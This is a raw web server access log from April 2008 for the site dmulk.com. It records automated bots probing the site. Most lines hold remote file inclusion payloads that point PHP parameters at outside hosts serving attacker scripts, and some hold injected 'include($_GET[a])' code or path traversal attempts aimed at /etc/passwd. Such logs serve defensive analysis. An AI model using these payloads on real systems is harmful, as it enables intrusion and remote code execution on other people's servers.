216.167.156.20 - - [23/Apr/2008:13:08:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:08:05 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:08:07 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:08:08 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:08:08 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:08:10 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:08:10 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:13:08:11 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://h1.ripway.com/scottcamposrj/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "dmulk.com"
89.149.242.164 - - [23/Apr/2008:13:08:11 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://h1.ripway.com/scottcamposrj/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "dmulk.com"
217.168.112.1 - - [23/Apr/2008:13:08:27 -0700] "GET /?mosConfig_absolute_path=http://www.spacecolonization.net/2080/var_cache/ed4n.php?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:13:08:29 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:08:34 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
89.221.240.132 - - [23/Apr/2008:13:08:44 -0700] "GET /logs/access_080215.log//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:13:08:45 -0700] "GET /logs/access.log//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:13:08:45 -0700] "GET //errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:13:08:46 -0700] "GET /logs//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:08:47 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:08:52 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.46.13.32 - - [23/Apr/2008:13:08:57 -0700] "GET /index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
64.46.13.32 - - [23/Apr/2008:13:08:57 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:13:09:30 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:13:09:30 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.94.38.182 - - [23/Apr/2008:13:09:32 -0700] "GET /logs/access_080329.log/index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.11.23 - - [23/Apr/2008:13:09:35 -0700] "GET /logs/access_080101.log/index.php?pageurl=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.94.38.182 - - [23/Apr/2008:13:09:35 -0700] "GET /index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
218.94.38.182 - - [23/Apr/2008:13:09:37 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:09:44 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:09:44 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:09:44 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.112 - - [23/Apr/2008:13:10:13 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.105 - - [23/Apr/2008:13:10:16 -0700] "GET /?S=D HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:10:17 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:10:28 -0700] "GET /logs/access_080218.log//errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:10:28 -0700] "GET //errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:10:29 -0700] "GET /logs//errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:10:31 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:10:51 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
87.106.184.203 - - [23/Apr/2008:13:10:52 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:13:10:52 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.238.250 - - [23/Apr/2008:13:10:57 -0700] "GET /index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.226.180 - - [23/Apr/2008:13:11:25 -0700] "GET /logs/access_080201.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graficamidiarte.com.br/admin/uploads/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Apr/2008:13:11:26 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graficamidiarte.com.br/admin/uploads/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Apr/2008:13:11:26 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graficamidiarte.com.br/admin/uploads/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:11:33 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:12:05 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:12:09 -0700] "GET /index.php?redir=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:12:09 -0700] "GET /logs/index.php?redir=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:13:12:16 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.29.18 - - [23/Apr/2008:13:12:18 -0700] "GET /logs/access_080207.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.238.250 - - [23/Apr/2008:13:12:20 -0700] "GET //citywriter/head.php?path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.29.18 - - [23/Apr/2008:13:12:21 -0700] "GET /logs/access_071122.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:12:38 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:12:39 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:12:39 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:12:50 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:12:53 -0700] "GET /index.php?redir=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:12:53 -0700] "GET /logs/index.php?redir=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.88.116.153 - - [23/Apr/2008:13:12:54 -0700] "GET //errors.php?error=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.94.38.182 - - [23/Apr/2008:13:13:03 -0700] "GET /index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:13:13:07 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:13:13:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:13:13:14 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.17.20.250 - - [23/Apr/2008:13:13:20 -0700] "GET /logs/access_080215.log//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:13:42 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:13:42 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:13:42 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:13:13:43 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:14:01 -0700] "GET /index.php?redir=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:14:37 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:14:37 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
198.65.21.204 - - [23/Apr/2008:13:14:49 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jdsales.de/contenido/includes/print.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.65.21.204 - - [23/Apr/2008:13:14:49 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jdsales.de/contenido/includes/print.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.65.21.204 - - [23/Apr/2008:13:14:49 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jdsales.de/contenido/includes/print.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:13:14:49 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:13:14:49 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:13:14:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:14:51 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:14:52 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:14:52 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:14:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:13:15:06 -0700] "GET /logs/access.log//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:13:15:07 -0700] "GET //errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:13:15:08 -0700] "GET /logs//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.94.38.182 - - [23/Apr/2008:13:15:28 -0700] "GET //citywriter/head.php?path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.11.23 - - [23/Apr/2008:13:15:45 -0700] "GET /logs/access_080308.log/index.php?redir=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.11.23 - - [23/Apr/2008:13:15:48 -0700] "GET /index.php?redir=../../../../../../../../../../etc/passwd HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.11.23 - - [23/Apr/2008:13:15:52 -0700] "GET /logs/index.php?redir=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:13:15:52 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.93 - - [23/Apr/2008:13:15:57 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
200.250.121.2 - - [23/Apr/2008:13:16:00 -0700] "GET /logs/access.log//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:13:16:01 -0700] "GET //errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:13:16:02 -0700] "GET /logs//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:16:13 -0700] "GET /logs/access_080224.log//init_basic.php?GALLERY_BASEDIR=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:16:13 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:13:16:13 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.195.52.115 - - [23/Apr/2008:13:16:37 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/ HTTP/1.0" 200 10089 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
198.65.21.204 - - [23/Apr/2008:13:16:50 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jdsales.de/contenido/includes/print.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:13:16:54 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:17:05 -0700] "GET /logs/access_080228.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:17:07 -0700] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:17:08 -0700] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.117.106.4 - - [23/Apr/2008:13:17:21 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:13:17:25 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:13:17:25 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:13:17:26 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.219.217.74 - - [23/Apr/2008:13:17:27 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
213.219.217.74 - - [23/Apr/2008:13:17:27 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
213.219.217.74 - - [23/Apr/2008:13:17:28 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
91.121.115.49 - - [23/Apr/2008:13:17:29 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.11.23 - - [23/Apr/2008:13:17:34 -0700] "GET /logs/access_080215.log/index.php?redir=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:13:17:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:18:13 -0700] "GET /logs/access.log//errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:18:14 -0700] "GET //errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:13:18:15 -0700] "GET /logs//errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.46.13.32 - - [23/Apr/2008:13:18:19 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.117.106.4 - - [23/Apr/2008:13:18:35 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.117.106.4 - - [23/Apr/2008:13:18:35 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
